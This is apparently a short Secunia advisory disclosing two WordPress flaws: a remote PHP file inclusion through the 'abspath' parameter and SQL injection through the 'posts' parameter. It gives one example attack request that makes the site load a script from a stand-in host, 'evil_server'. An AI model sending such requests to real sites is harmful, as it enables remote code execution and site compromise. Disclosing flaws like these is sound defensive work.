Description: Two vulnerabilities have been identified in Wordpress allowing malicious people to execute arbitrary PHP or inject SQL.
One problem is that the "abspath" parameter isn't verfied in the "/wp-links/links.all.php" script.
By requesting "/wp-links/links.all.php?abspath=http://evil_server", it is possible to include a malicious "/blog.header.php" PHP script from "http://evil_server".
The other problem is that the "posts" parameter isn't verified in "/blog.header.php" before it is used in an SQL statement. This allows malicious people to manipulate SQL queries.
If you have new information regarding this Secunia advisory or a product in our database, please send it to us using either our web form or email us at vuln@secunia.com.
Ideas, suggestions, and other feedback are most welcome.
